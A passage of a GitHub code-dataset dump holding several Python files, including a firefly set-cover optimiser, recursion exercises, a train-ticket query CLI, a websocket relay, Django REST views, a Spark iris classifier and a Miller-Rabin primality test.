self.create_full_dataset(10000)\n value = self.model.evaluate(x_test, y_test, 1000)\n return value\n\n ## Function loading the weights of the latest trained version of the neural network\n # @param path: The path to the weight data directory\n def load(self, path=None):\n if path == None:\n path = self.checkpoint_path\n self.model.load_weights(path)\n","repo_name":"AKnuazev/poker_artificial_intelligence","sub_path":"source/networks/policy_network/policy_network_model.py","file_name":"policy_network_model.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"39045092162","text":"import numpy as np\nimport pandas as pd\nimport time\n\n\ndef ffa_algorithm(table, costs, pop_size=30, max_iter=150, gamma=1.0, betta_0=1.0, notation=\"CS\", transfer_fun=\"stan\",\n distance=\"euclid\", betta_pow=2, alpha=0.5, alpha_inf=None, alpha_0=None,\n gamma_alter=0, move_type=None):\n discrete = standard_discrete\n binary_fun = binarization(get_transfer_function(transfer_fun), discrete)\n repair_fun = repair_solution(table, costs, notation)\n fireflies = generate_solution((pop_size, len(costs)))\n curr_best = np.ones(len(costs))\n curr_best_intensity = np.inf\n\n if gamma_alter > 0:\n gamma = gamma / vector_dist(np.ones(len(costs)), np.zeros(len(costs)), distance) ** gamma_alter\n print(f\"Gamma: {gamma}\")\n\n get_attractive = calc_attractive\n\n if alpha_0 == 0 or alpha_inf == 0:\n get_alpha = None\n else:\n get_alpha = lambda t: alpha_inf + (alpha_0 - alpha_inf) * (np.e ** -t)\n\n def lambda_move_best(x1, x2, betta, alpha=0.1):\n U = np.random.uniform(-1, 1, x1.shape)\n return x1 + betta * (x2 - x1) + alpha * U * (x1 - curr_best)\n\n def lambda_move(x1, x2, betta, alpha=0.1):\n U = np.random.uniform(-1, 1, x1.shape)\n return x1 + betta * (x2 - x1) + alpha * U\n\n if move_type == 1: # standart\n move_fun = move_fireflies\n elif move_type == 2: # lambda_best\n move_fun = lambda_move_best\n elif move_type == 3: # lambda\n move_fun = lambda_move\n else:\n raise ValueError(\"Error\")\n\n _ = list(map(repair_fun, fireflies))\n\n light_intensity = calc_fitness(fireflies, costs)\n\n for step in range(max_iter):\n print(step)\n print(f\"Elapsed time {time.time() - start_time}\")\n for i in range(len(fireflies)):\n for j in range(0, i):\n if light_intensity[j] < light_intensity[i]:\n fireflies[i] = move_fun(fireflies[i], fireflies[j],\n get_attractive(betta_0, gamma,\n vector_dist(fireflies[i], fireflies[j], distance),\n betta_pow), alpha)\n fireflies[i] = binary_fun(fireflies[i])\n repair_fun(fireflies[i])\n light_intensity[i] = calc_fitness(fireflies[i], costs)\n\n if get_alpha:\n alpha = get_alpha(step)\n\n best = np.argmin(light_intensity)\n if curr_best_intensity > light_intensity[best]:\n print(light_intensity[best])\n curr_best_intensity = light_intensity[best]\n curr_best = fireflies[best].copy()\n\n return curr_best, curr_best_intensity\n\n\ndef move_fireflies(x1, x2, betta, alpha=0.1):\n rand = np.random.sample(len(x1))\n return x1 + betta * (x2 - x1) + alpha * (rand - 0.5)\n\n\ndef calc_attractive(betta, gamma, r, m=2):\n return betta * np.e ** (-gamma * (r ** m))\n\n\ndef vector_dist(x1, x2, norm_type=\"euclid\"):\n if norm_type.lower() == \"euclid\":\n ord = 2\n elif norm_type.lower() == \"manhattan\":\n ord = 1\n elif norm_type.lower() == \"chebyshev\" or norm_type.lower() == \"cheb\":\n ord = np.Inf\n else:\n raise Exception(f\"Incorrect value {norm_type} for parameter type!\")\n return np.linalg.norm(x2 - x1, ord=ord)\n\n\ndef generate_solution(size):\n return np.random.randint(0, 2, size).astype(\"float\")\n\n\ndef calc_fitness(solution, costs):\n dim = 0 if solution.ndim == 1 else 1\n return np.array(np.sum(np.multiply(solution, costs), dim), dtype=\"float32\")\n\n\ndef get_transfer_function(transfer_fun=\"s1\"):\n if transfer_fun == 1:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-2.0 * x))\n elif transfer_fun == 2:\n transfer = lambda x: 1.0 / (1.0 + np.e ** -x)\n elif transfer_fun == 3:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-x / 2.0))\n elif transfer_fun == 4:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-x / 3.0))\n elif transfer_fun == 5:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-3.0 * x))\n elif transfer_fun == 6: # stan\n transfer = lambda x: np.abs(2 / np.pi * np.arctan(x * np.pi / 2))\n else:\n raise Exception(f\"Incorrect value {transfer_fun} for parameter transfer_fun!\")\n return transfer\n\n\ndef standard_discrete(transfer_fun, x):\n x = transfer_fun(x)\n r = np.random.sample(x.shape)\n return np.where(x >= r, 1.0, 0.0)\n\n\ndef binarization(transfer, discretization):\n def decorator(x):\n if x.ndim == 1:\n return discretization(transfer, x)\n else:\n return np.array([discretization(transfer, e) for e in x], dtype=float)\n\n return decorator\n\n\ndef repair_solution(table, costs, notation):\n rows = {elem[0] for elem in table}\n columns = {elem[1] for elem in table}\n alpha = {f: s for f, s in zip(\n rows, [{elem[1] for elem in table if elem[0] == t} for t in rows]\n )}\n betta = {f: s for f, s in zip(\n columns, [{elem[0] for elem in table if elem[1] == t} for t in columns]\n )}\n\n if notation.lower() == \"sc\":\n alpha, betta = betta, alpha\n rows = columns\n\n def wrapped(solution):\n S = {i + 1 for i, e in enumerate(solution) if e == 1.0}\n w_num = {e1: e2 for e1, e2 in zip(\n rows, [len(S & alpha[i]) for i in rows]\n )}\n U = {e for e in w_num if w_num[e] == 0}\n while U:\n row = U.pop()\n j = min(alpha[row],\n key=lambda r: np.Inf if len(U & betta[r]) == 0\n else costs[r - 1] / len(U & betta[r]))\n S.add(j)\n for curr in betta[j]: w_num[curr] += 1\n U = U - betta[j]\n\n S = list(reversed(list(S)))\n for row in S[:]:\n for curr in betta[row]:\n if w_num[curr] < 2:\n break\n else:\n S.remove(row)\n for c in betta[row]: w_num[c] -= 1\n S = np.array(S) - 1\n solution[:] = np.zeros(len(solution))\n solution[S] = 1.0\n\n return wrapped\n\n\ndef check_decision(data, result):\n n_cols = len(set(data.j))\n if n_cols == len(set(data[data.i.isin(result)].j)):\n print(\"Decision is correct\")\n else:\n print(\"DECISION WRONG\")\n\n\n\nstart_time = time.time()\n\n# set params\nnotation = \"sc\"\ntransfer_fun = 1\nevent_horizon = \"euclid\"\n\npop_size = 160\nmax_iter = 100\nInputDataSet = pd.read_csv(\"gen_test_160x1600.csv\", header=None, names=['i', 'j'])\nInputDataSet['Cost'] = 1\nif notation.lower() == \"sc\":\n cover_rows = np.unique(InputDataSet[\"i\"])\nelse:\n cover_rows = np.unique(InputDataSet[\"j\"])\n\ntmp_lst = InputDataSet[\"j\"].tolist()\ncosts = np.array(InputDataSet[\"Cost\"][[tmp_lst.index(e) for e in cover_rows]])\ntable = np.array(InputDataSet[[\"i\", \"j\"]])\n\n\noptimum, values = ffa_algorithm(table, costs, pop_size=pop_size, max_iter=max_iter, gamma=1, betta_0=1,\n notation=notation,\n transfer_fun=transfer_fun, distance=event_horizon, betta_pow=2,\n alpha=1, alpha_inf=0, alpha_0=0, gamma_alter=0,\n move_type=1)\nprint(f\"Elapsed time {time.time() - start_time}\")\nprint(f\"Result cost: {values}\")\nprint(f\"Optimuum: {[i + 1 for i, e in enumerate(optimum) if e > 0.0]}\")\n\noptimum = pd.DataFrame(np.where(optimum > 0.0)[0] + 1, columns=[\"Row_\"])\ncheck_decision(InputDataSet, list(optimum.Row_))\n","repo_name":"Makkksx/VKR2023","sub_path":"Алгоритм Светлячков/ffa.py","file_name":"ffa.py","file_ext":"py","file_size_in_byte":7477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26651328824","text":"\"\"\"\r\n定义了一个递归函数\r\n\"\"\"\r\n\r\ndef list_sum(num_list):\r\n if len(num_list) == 1: #定义了递归停止条件\r\n return num_list[0]\r\n else:\r\n return num_list[0] + list_sum(num_list[1:])\r\n\r\nprint(list_sum([1,2,3,4,5,6,7,8,9,10]))\r\n\r\n\r\ndef fac(n):\r\n if n == 0 or n == 1:\r\n return 1\r\n else:\r\n return n *fac(n-1)\r\n\r\nprint(sum([fac(i) for i in range(1,10)]))\r\n\r\ndef toStr(n,base):\r\n converString = \"0123456789ABCDE\"\r\n if n < base:\r\n return converString[n]\r\n else:\r\n return toStr(n//base,base) + converString[n % base]\r\nprint(toStr(256,2))\r\n\"\"\"\r\nimport turtle\r\n\r\nmyTurtle = turtle.Turtle()\r\nmyWin = turtle.Screen()\r\n\r\ndef drawSpiral(myTurtle, lineLen):\r\n if lineLen > -105:\r\n myTurtle.forward(lineLen)\r\n myTurtle.right(30)\r\n drawSpiral(myTurtle,lineLen-5)\r\n\r\ndrawSpiral(myTurtle,100)\r\nmyWin.exitonclick()\r\n\r\n\"\"\"\r\nimport turtle\r\n\r\ndef tree(branchLen,t):\r\n if branchLen > 5:\r\n t.forward(branchLen)\r\n t.right(20)\r\n tree(branchLen-15,t)\r\n t.left(40)\r\n tree(branchLen-15,t)\r\n t.right(20)\r\n t.backward(branchLen)\r\n\r\ndef main():\r\n t = turtle.Turtle()\r\n myWin = turtle.Screen()\r\n t.left(90)\r\n t.up()\r\n t.backward(100)\r\n t.down()\r\n t.color(\"green\")\r\n tree(75,t)\r\n myWin.exitonclick()\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ZhaohuiTomas/data-structure","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71082388217","text":"'''\nUsage:\n tickets [-dgktz] \n\nOptions:\n -h --help 查看帮助\n -d 动车\n -g 高铁\n -k 快速\n -t 特快\n -z 直达\n\n\n'''\nfrom docopt import docopt\nimport urllib3\nurllib3.disable_warnings()\n\nimport requests\nimport stations\nfrom prettytable import PrettyTable\n\n\nclass TrainsInfo(object):\n headers = '车次 车站 时间 历时 一等座 二等座 软卧 硬卧 软座 硬座 无座'.split()\n\n def __init__(self,raw_trains,options):\n self.raw_trains=raw_trains\n self.options=options\n\n def get_from_to_station_name(self,data_list):\n from_station_telecode=data_list[6]\n to_station_telecode=data_list[7]\n return '\\n'.join(\n [\n stations.get_name(from_station_telecode),\n stations.get_name(to_station_telecode)\n ]\n \n )\n def get_start_arrive_time(self,data_list):\n return '\\n'.join(\n [\n data_list[8],\n data_list[9]\n\n ]\n \n )\n def need_print(self,data_list):\n station_train_code=data_list[3]\n initial=station_train_code[0].lower()\n return (not self.options or initial in self.options)\n\n def parse_train_data(self,data_list):\n return {\n 'station_train_code': data_list[3],\n 'from_to_station_name': self.get_from_to_station_name(data_list),\n 'start_arrive_time': self.get_start_arrive_time(data_list),\n 'lishi': data_list[10],\n 'first_class_seat': data_list[31] or '--',\n 'second_class_seat': data_list[30] or '--',\n 'soft_sleep': data_list[23] or '--',\n 'hard_sleep': data_list[28] or '--',\n 'soft_seat': data_list[24] or '--',\n 'hard_seat': data_list[29] or '--',\n 'no_seat': data_list[33] or '--'\n }\n\n\n @property\n def trains(self):\n for train in self.raw_trains:\n data_list = train.split('|')\n if self.need_print(data_list):\n yield self.parse_train_data(data_list).values()\n\n def pretty_print(self):\n pt = PrettyTable()\n pt._set_field_names(self.headers)\n for train in self.trains:\n #print(train)\n pt.add_row(train)\n print(pt)\n\nclass TrainsCheck(object):\n url=(\n 'https://kyfw.12306.cn/otn/leftTicket/query?'\n 'leftTicketDTO.train_date={}&'\n 'leftTicketDTO.from_station={}&'\n 'leftTicketDTO.to_station={}&'\n 'purpose_codes=ADULT'\n ) \n def __init__(self):\n self.arguments = docopt(__doc__)\n #print(self.arguments)\n self.from_station = stations.get_telecode(self.arguments[''])\n self.to_station = stations.get_telecode(self.arguments['']) \n self.date = self.arguments['']\n #print(self.arguments.items())\n self.options = ''.join([key for key, value in self.arguments.items() if value is True]) \n \n @property\n def request_url(self):\n return self.url.format(self.date , self.from_station, self.to_station)\n \n #2018-04-28\n def run(self):\n #print(self.request_url)\n r= requests.get(self.request_url,verify=False)\n #print(r.json())\n trains = r.json()['data']['result']\n TrainsInfo(trains,self.options).pretty_print()\n\nif __name__ == '__main__':\n TrainsCheck().run()","repo_name":"GitHubDiom/Tickets_Master","sub_path":"tickets-master/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2519664141","text":"#!/usr/bin/env python\nimport time\n#TCP stuff\nimport socket\nTCP_IP = '0.0.0.0'\nTCP_PORT = 5008\nBUFFER_SIZE = 80 # Normally 1024, but we want fast response\n#global s\n#print('binding')\n#s.bind((TCP_IP, TCP_PORT))\n#s.listen(1)\ndef connectUpstream():\n print('Connecting to upstream server')\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('binding')\n bound = False\n while not bound:\n try:\n s.bind((TCP_IP, TCP_PORT))\n bound = True\n except:\n print('Could not bind. Sleeping 1s and trying again.')\n time.sleep(1)\n pass\n s.listen(1)\n print('Bound. Awaiting connection...')\n global conn, addr\n conn, addr = s.accept()\n print('Connection address: ',addr)\n print('connection : ', conn)\n\nconnectUpstream()\n\n#handle websocket connections\nconnections = set()\nn=0\n\nasync def recvSensor():\n data = conn.recv(BUFFER_SIZE)\n #print(data)\n if not data:\n print('not data')\n conn.shutdown(1)\n conn.close()\n connectUpstream()\n return data.decode()\n\ndata = recvSensor()\n#conn, addr = s.accept()\n#print('Connection address:', addr)\n# WS server that sends messages at random intervals\nimport asyncio\nimport datetime\nimport random\nimport websockets\nasync def handler(websocket, path):\n #global n\n #n=n+1\n connections.add(websocket)\n #print(\"adding subscriber #\", n)\n #try:\n #async for msg in websocket:\n #pass # ignore\n #except websockets.ConnectionClosed:\n #pass\n #finally:\n #print(\"removing subscriber #\", n)\n #connections.remove(websocket)\n print(connections)\n #data = recvSensor()\n #await websocket.send(data.decode())\n await asyncio.sleep(0.001)\n while True:\n await asyncio.sleep(0.01)\n #now = datetime.datetime.utcnow().isoformat() + 'Z'\n #await websocket.send(now)\n #await asyncio.sleep(random.random() * 3)\n #data = conn.recv(BUFFER_SIZE)\n #print(data)\n data = await recvSensor()\n # = data.decode()\n print(data)\n #await websocket.send(data.decode())\n for websocket in connections:\n if not websocket.open:\n connections.remove(websocket)\n break \n await websocket.send(data)\n\nasync def wsSend():\n print('wssend')\n asyncio.get_event_loop().run_forever()\n while True:\n print('recv data')\n await recvSensor()\n print(connections)\n for websocket in connections:\n websocket.send(recvSensor())\nprint('starting server')\nstart_server = websockets.serve(handler, '0.0.0.0', 5009)\nprint('A')\nasyncio.get_event_loop().run_until_complete(start_server)\nprint('B')\nasyncio.get_event_loop().run_forever()\n \nprint('C')\n\n#loop = asyncio.get_event_loop()\n#loop.run_until_complete(wsSend())\n#print('D')\n#loop.run_forever()\n#print('E')\n#try:\n #asyncio.ensure_future(wsSend())\n #data = asyncio.async(recvSensor())\n #wsSend()\n #loop.run_forever()\n#except KeyboardInterrupt:\n #pass\n#finally:\n #print('closing loop')\n #loop.close()\n#asyncio.get_event_loop().run_forever()\n\n\n#while 1:\n #data = recvSensor()\n\n# if not data: break\n# print(data.decode())\n #conn.send(data) # echo\n#conn.close()\n","repo_name":"TKearney/thetickerplant","sub_path":"server/python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33325565746","text":"from django.db.models import Q\n\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render, get_object_or_404\nfrom django_filters.conf import settings\nfrom djoser.compat import get_user_email\nfrom djoser.views import UserView\n\nfrom rest_framework.permissions import (\n AllowAny,\n IsAdminUser,\n IsAuthenticated,\n DjangoModelPermissions,\n IsAuthenticatedOrReadOnly,\n)\n\nfrom rest_framework.pagination import (\n LimitOffsetPagination,\n PageNumberPagination,\n)\nfrom rest_framework.filters import (\n SearchFilter,\n OrderingFilter,\n)\n# ###################################################\nfrom rest_framework.status import HTTP_200_OK\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\n# #################################################\nfrom rest_framework.generics import (\n ListAPIView,\n RetrieveAPIView,\n UpdateAPIView,\n DestroyAPIView,\n CreateAPIView,\n ListCreateAPIView,\n RetrieveUpdateAPIView,\n)\nfrom rest_framework.serializers import ModelSerializer\n\nfrom UserRegistrationApp.models import Profile, UserPreference\nfrom UserRegistrationApp.serializers import (ProfileCreateSerializer,\n ProfileListSerializer,\n ProfileDetailSerializer,\n ProfileUpdateSerializer,\n UserCreateSerializer,\n UserUpdateSerializer,\n UserSerializer,\n PreferenceCreateSerializer,\n )\n\nfrom .permissions import IsOwnerOrReadOnly, AllowAnonymous, IsProfileOwnerOrReadOnly\n\nfrom .pagination import ProfileLimitPagination\n\n# ######### START USER VIEWS ##########\n\nUser = get_user_model()\n\n\nclass UserCreateAPIView(CreateAPIView):\n\n serializer_class = UserCreateSerializer\n queryset = User.objects.all()\n permission_classes = [AllowAnonymous]\n\n# class UserUpdateAPIView(UpdateAPIView):\n# serializer_class = UserUpdateSerializer\n# queryset = User.objects.all()\n# permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n# ######### END USER VIEWS ###########\n\n# ######### START PROFILE VIEWS ##########\n# Just for view\n\n\nclass ProfileCreateAPIView(ListCreateAPIView):\n\n \"\"\"\n A class based view for creating and fetching student records\n \"\"\"\n permission_classes = (AllowAnonymous, AllowAny)\n pagination_class = ProfileLimitPagination\n serializer_class = ProfileCreateSerializer\n queryset = Profile.objects.all()\n\n def get(self, format: object = None) -> object:\n \"\"\"\n Get all the student records\n :param format: Format of the student records to return to\n :return: Returns a list of student records\n \"\"\"\n profiles = Profile.objects.all()\n serializer = ProfileCreateSerializer(profiles, many=True)\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n\n \"\"\"\n Create a student record\n :param format: Format of the student records to return to\n :param request: Request object for creating student\n :return: Returns a student record\n \"\"\"\n serializer = ProfileCreateSerializer(data=request.data)\n if serializer.is_valid(raise_exception=ValueError):\n # serializer.create(validated_data=request.data)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.error_messages,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProfileALLListAPIView(ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n permission_classes = (IsAuthenticated, IsAdminUser,)\n pagination_class = ProfileLimitPagination # PageNumberPagination\n\n\nclass ProfileListAPIView(ListAPIView):\n # queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n filter_backends = [SearchFilter, OrderingFilter]\n search_fields = ['user__first_name', 'mobile_no', 'user__last_name']\n pagination_class = ProfileLimitPagination\n\n def get_queryset(self):\n # queryset_list = super(ProfileListAPIView, self).get_queryset(*args, **kwargs)\n # if you want to use the above line you should add the first comment in the class\n # but we can use different way by add queryset = Profile.objects.all() in the function\n\n queryset_list = Profile.objects.filter(public_profile_ind=True)\n query = self.request.GET.get(\"q\", )\n # should add self. before request.GET..etc. because it is ClassBasedView\n\n if query:\n queryset_list = queryset_list.filter(\n Q(user__first_name__contains=query) |\n Q(user__last_name__contains=query) |\n Q(user__email__contains=query) |\n Q(user__username__contains=query) |\n Q(mobile_no__icontains=query) |\n Q(facebook_id__icontains=query) |\n Q(google_id__icontains=query) |\n Q(longitude__icontains=query) |\n Q(latitude__icontains=query) |\n Q(height__icontains=query) |\n Q(weight__icontains=query)\n ).distinct()\n return queryset_list\n\n # permission_classes = (IsAuthenticated, IsAdminUser,)\n # pagination_class =\n\n\nclass ProfileDetailAPIView(RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileDetailSerializer\n lookup_field = 'user' # if i want to find without using pk\n\n\nclass ProfileUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileUpdateSerializer\n permission_classes = [IsAuthenticated, IsProfileOwnerOrReadOnly]\n\n # lookup_field = 'user'\n # lookup_url_kwarg = 'abc'\n #\n # def perform_update(self, serializer):\n # # super(ProfileUpdateAPIView, self).perform_update(serializer)\n #\n # serializer.save(user=self.request.user)\n\n # def perform_update(self, serializer):\n # serializer.save(user=self.request.user)\n\n\nclass ProfileDeleteAPIView(DestroyAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n # lookup_field = 'user'\n\n# Create your views here.\n#\n# from rest_framework import viewsets, generics, mixins, permissions\n# from rest_framework.parsers import FormParser, MultiPartParser\n#\n# from .models import Profile\n# from .serializers import ProfileSerializer\n#\n#\n# class ProfileView(viewsets.ModelViewSet):\n# queryset = Profile.objects.all()\n# serializer_class = ProfileSerializer\n# print('dasdasdasdadasdasdsd')\n\n\n# User = get_user_model()\n\n\nclass UserUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n # authentication_classes = (authentication.TokenAuthentication,)\n # permission_classes = (permissions.IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def post(self, request):\n self.object = self.get_object()\n serializer = UserSerializer(self.object, data=request.data)\n if serializer.is_valid():\n self.object.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PreferenceCreateAPIView(CreateAPIView):\n serializer_class = PreferenceCreateSerializer\n queryset = UserPreference.objects.all()\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n\n\nclass PreferenceUpdateAPIView(RetrieveUpdateAPIView):\n serializer_class = PreferenceCreateSerializer\n queryset = UserPreference.objects.all()\n lookup_field = 'user'\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n","repo_name":"HishamDigitalHub/SportActivities","sub_path":"UserRegistrationApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40613797940","text":"paths = [[\"London\", \"New York\"], [\"New York\", \"Lima\"], [\"Lima\", \"Sao Paulo\"]]\n\nfrom collections import defaultdict\n\n\ndef dest_city(paths):\n city_placement = defaultdict(list)\n unique_cities = set()\n for cities in paths:\n for i, city in enumerate(cities):\n city_placement[i].append(city)\n unique_cities.add(city)\n\n destination_city = city_placement[1]\n starting_city = city_placement[0]\n\n for city in destination_city:\n if city not in starting_city:\n return city\n","repo_name":"amymhaddad/solve_it","sub_path":"leetcode/destination_city/destination_city.py","file_name":"destination_city.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1576835364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlugin to parse outputs from the scripts from cod-tools package.\nThis plugin is in the development stage. Andrius Merkys, 2014-10-29\n\"\"\"\nfrom aiida.parsers.plugins.codtools.ciffilter import CiffilterParser\nfrom aiida.orm.calculation.job.codtools.cifcodcheck import CifcodcheckCalculation\nfrom aiida.orm.data.parameter import ParameterData\n\n__copyright__ = u\"Copyright (c), 2015, ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE (Theory and Simulation of Materials (THEOS) and National Centre for Computational Design and Discovery of Novel Materials (NCCR MARVEL)), Switzerland and ROBERT BOSCH LLC, USA. All rights reserved.\"\n__license__ = \"MIT license, see LICENSE.txt file\"\n__version__ = \"0.4.0\"\n__contributors__ = \"Andrea Cepellotti, Andrius Merkys, Giovanni Pizzi\"\n\nclass CifcodcheckParser(CiffilterParser):\n \"\"\"\n Specific parser for the output of cif_cod_check script.\n \"\"\"\n def _check_calc_compatibility(self,calc):\n from aiida.common.exceptions import ParsingError\n if not isinstance(calc,CifcodcheckCalculation):\n raise ParsingError(\"Input calc must be a CifcodcheckCalculation\")\n\n def _get_output_nodes(self, output_path, error_path):\n \"\"\"\n Extracts output nodes from the standard output and standard error\n files.\n \"\"\"\n import re\n\n messages = []\n if output_path is not None:\n with open(output_path) as f:\n content = f.readlines()\n lines = [x.strip('\\n') for x in content]\n if re.search( ' OK$', lines[0] ) is not None:\n lines.pop(0)\n messages.extend(lines)\n\n if error_path is not None:\n with open(error_path) as f:\n content = f.readlines()\n lines = [x.strip('\\n') for x in content]\n messages.extend(lines)\n\n output_nodes = []\n output_nodes.append(('messages',\n ParameterData(dict={'output_messages':\n messages})))\n return output_nodes\n","repo_name":"BIGDATA2015-AIIDA-EXTENSION/Aiida-SQLAlchemy-Querytool","sub_path":"aiida/parsers/plugins/codtools/cifcodcheck.py","file_name":"cifcodcheck.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3709967623","text":"\"\"\"\n\nTask: Given string S, find out whether S is a valid regex or not\n\nInput: T containing number of test cases\nnext t lines are strings s\n\nOutput: return True or False\n\n\"\"\"\n\nimport re\n\n\nif __name__ == '__main__':\n n = int(input())\n for i in range(n):\n try:\n re.compile(input())\n print('True')\n except re.error:\n print('False')\n","repo_name":"alothings/python_challenges","sub_path":"hacker_rank/python/errors_exceptions/incorrect_regex.py","file_name":"incorrect_regex.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6047908486","text":"from pyspark import SparkConf, SparkContext\n\nfrom pyspark.sql import Row\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import SQLContext\n\nfrom pyspark.ml.linalg import DenseVector\nfrom pyspark.ml.feature import IndexToString , StringIndexer , VectorIndexer\n\nfrom pyspark.ml.classification import LogisticRegression , RandomForestClassifier\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\n# Spark set-up\nconf = SparkConf()\nconf.setAppName(\"Logistic regression\")\n\nsc = SparkContext(conf=conf)\nsc.setLogLevel(\"WARN\")\n\nspark = SparkSession(sc)\n\n# Load dataset file as RDD\nrdd = sc.textFile(\"/user/spark/iris.txt\")\nrdd = rdd.map(lambda x: x.split(','))\n\ndef renameLabel(x) :\n\tif x[4] == 'Iris-setosa':\n\t\tx[4] = 1\n\telif x[4] == 'Iris-versicolor':\n\t\tx[4] = 2\n\telse:\n\t\tx[4] = 3\n\treturn x\n\nrdd = rdd.map(renameLabel)\nrdd = rdd.map(lambda x: [float(x[0]), float(x[1]), float(x[2]), float(x[3]), int(x[4])]) \n\n# Create dataframe for ML model\ndf = spark.createDataFrame(rdd, [\"sep_len\", \"sep_wid\", \"pet_len\", \"pet_wid\", \"class\"])\ndata = df.rdd.map(lambda x: (DenseVector(x[:-1]), x[-1]))\ndf = spark.createDataFrame(data, [\"features\", \"label\"])\n\n# Split data into train and test\ntrain_data, test_data = df.randomSplit([.7,.3], seed=0)\n\n# Declare ML model\nlogistic = LogisticRegression(featuresCol = \"features\", labelCol = \"label\", maxIter=10, regParam=0.05)\n\n# Train the model using training data\nmodel = logistic.fit(train_data)\n\n# Check the model on test data\npredicted = model.transform(test_data)\npredictAndLabel = predicted.select(\"prediction\", \"label\")\nprint(predictAndLabel.show(20))\n\n# Model stats\naccuracy = model.summary.accuracy\nprecision = model.summary.weightedPrecision\nrecall = model.summary.weightedRecall\nfMeasure = model.summary.weightedFMeasure()\nprint(\"Accuracy: %0.2f\\nPrecision: %0.3f\\nRecall: %0.3f\\nF-measure: %0.3f\"\n % (accuracy, precision, recall, fMeasure))\n\n\ndata = df\n\nlabel = StringIndexer(inputCol=\"label\" , outputCol=\"indexedLabel\").fit(data)\nfeatureIndexer = VectorIndexer(inputCol=\"features\", outputCol=\"indexedFeatures\", maxCategories=4).fit(data)\n(trainingData,testData) = data.randomSplit([0.7,0.3])\nrf = RandomForestClassifier(labelCol=\"indexedLabel\",featuresCol=\"indexedFeatures\", numTrees=10)\nlabelConverter= IndexToString(inputCol=\"prediction\",outputCol=\"predictedLabel\",labels=labelIndexer.labels)\npipeline = Pipeline(stages=[labelIndexer,featureIndexer,rf,labelConverter])\nmodel = pipeline.fit(trainingData)\npred = model.transforms(testData)\npred.select(\"predictedLabel\", \"label\", \"features\").show(8)\nevaltr = MultiClassificationEvaluator(labelCol = \"indexedLabel\" , predictionCol = \"prediction\" , metricName = \"accuracy\" )\naccuracy = evaltr.evaluate(predictions)\nprint(\"Accuracy = \"%(accuracy))\nprint(\"Error = \" %(1.0 - accuracy)) \n","repo_name":"shahrukh-ak/Big-data_Spark-hands-on","sub_path":"shahrukh_khan_task6.py","file_name":"shahrukh_khan_task6.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42882105390","text":"\"\"\"\nmiller_rabin\nThe Miller-Rabin Primality Test\n\"\"\"\n\n__author__ = \"Nic Manoogian\"\n\nimport argparse\nfrom random import randint\n\ndef miller_rabin(n, k=50):\n \"\"\"\n Miller-Rabin Primality Test\n Returns true if n is a (probable) prime\n Returns false if n is a composite number\n \"\"\"\n if n < 6:\n return [False, False, True, True, False, True][n]\n elif n & 1 == 0:\n return False\n s = 0\n d = n - 1\n while d % 2 == 0:\n s = s + 1\n d = d >> 1\n for _ in range(k):\n a = randint(2, n-2)\n x = pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for _ in range(s-1):\n x = pow(x, 2, n)\n if x == 1:\n return False\n elif x == n - 1:\n a = 0\n break\n if a:\n return False\n return True\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Miller-Rabin Primality 